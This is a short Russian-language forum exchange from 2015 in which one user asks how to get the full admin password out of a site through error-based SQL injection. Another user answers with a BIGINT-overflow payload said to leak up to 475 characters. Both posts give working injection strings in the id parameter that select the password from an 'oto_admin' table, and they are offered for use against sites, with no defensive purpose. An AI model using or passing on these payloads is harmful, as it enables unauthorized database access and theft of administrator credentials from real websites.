05.02.2015, 12:04
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от madam
блин, вот так выводится 31 символ ?id=1+|(extractvalue(1,concat(0x3a,(SELECT password FROM oto_admin LIMIT 1)))) ,как вывести последний символ? LIMIT 1,1 пустая страница
Данные векторы потихоньку уходят в прошлое. Если версия форка позволяет, используйте вектор с наибольшим количеством вывода символов ( 475! error-based через begint):
Сообщение от None
?id=1+|(SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (SELECT password FROM oto_admin LIMIT 1)i)a)
Пример: /showpost.php?p=3815102&postcount=23814
|
|
|